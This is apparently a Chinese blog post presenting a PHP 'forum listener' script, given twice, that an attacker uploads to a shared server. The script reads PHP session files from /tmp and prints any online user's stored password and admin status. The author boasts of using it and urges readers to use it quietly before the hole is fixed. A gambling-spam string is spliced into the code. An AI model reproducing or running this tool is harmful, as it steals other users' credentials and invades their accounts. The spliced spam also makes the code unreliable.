php查看session内容的函数

之所以是能写出来这个函数,主要是对该网站的session结构清楚,如:name|s:4:”tasm”;passwd|s:6:”111111″;mode|s:1:”1″,也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:
? function submit1(){ global $username; print “title论坛监听器/title”;
$i=0; if($username==”tasm”||$username==”Tasm”) { print
“你也太黑了吧?连我你也查?”; return; } $path=”/tmp/”; $d = dir($path);
while($entry=$d-read()){ if(substr($entry,0,4)==”sess”){
$entry=$path.$entry; $ary=@file($entry); if(!empty($ary[0])){ $ary =
explode(“;”,$ary[0]); $name= explode(“:”,$ary[0]);
if($name[2]==”””.$username.”””){ $passwd= explode(“:”,$ary[1]);
$mode=explode(“:”,$ary[3]); print
“用户笔名:”.$name[2].”br使用密码:”.$passwd[2].”br使用模式:”;
if($mode[1]==1) print “font color=red管理员/font”; else print
“一般用户”; print”brbr偷窃他人密码是不道德行为请少少为之br”; $i=1;
break; }}}} if(!$i) print “用户:”.$username.”真的在线吗?如你确定,a
href=javascript:history.go(-1)请再来一次/a,不要多打空格!”; $d-close();
} function login(){ ? html head title论坛监听器/title meta
“Content-Type” content=”text/html; charset=gb2312″ /head body
bgcolor=”#FFFFFF” div align=”center” p论坛监听器 /p p /p table
width=”500″ border=”0″ cellspacing=”0″ cellpadding=”0″ tr td
colspan=”2″当你看到一用户在线时你想看他的密码,你要如何作呢?/td /tr tr
td colspan=”2″让我来告诉你:就是使用本程序。/td /tr tr td
colspan=”2″font
color=red郑重申明:本程序为自由程序,由它所造成的任何损失本人盖不负责。/font
br不过这个问题也许很快就会被堵上,个位还是不要张扬的偷着用吧。/td /tr
/table form name=”form1″ method=”post” action=”?print $PHP_SELF ?”
p请输入你要查的用户名:br input type=”text” name=”username” /p p input
type=”submit” name=”submit1″ value=”我同意以上申明,开始查找” /p /form p
/p /div /body /html ? } //————–main() if($submit1) submit1();
else login(); ?

如:name|s:4:”tasm”;passwd|s:6:”111111″;mode|s:1:”1″,也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:
<?
function submit1(){
global $username;
print “<title>论坛监听器</title>”;
$i=0;
if($username==”tasm”||$username==”Tasm”)
{
print “你也太黑了吧?连我你也查?”;
澳门新葡亰网站注册,return;
}
$path=”/tmp/”;
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)==”sess”){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(“;”,$ary[0]);
$name= explode(“:”,$ary[0]);
if($name[2]==”””.$username.”””){
$passwd= explode(“:”,$ary[1]);
$mode=explode(“:”,$ary[3]);
print
“用户笔名:”.$name[2].”<br>使用密码:”.$passwd[2].”<br>使用模式:”;
if($mode[1]==1)
print “<font color=red>管理员</font>”;
else
print “一般用户”;
print”<br><br>偷窃他人密码是不道德行为请少少为之<br>”;
$i=1;
break;
}}}}
if(!$i)
print “用户:”.$username.”真的在线吗?如你确定,<a
href=’javascript:history.go(-1)’>请再来一次</a>,不要多打空格!”;
$d->close();
}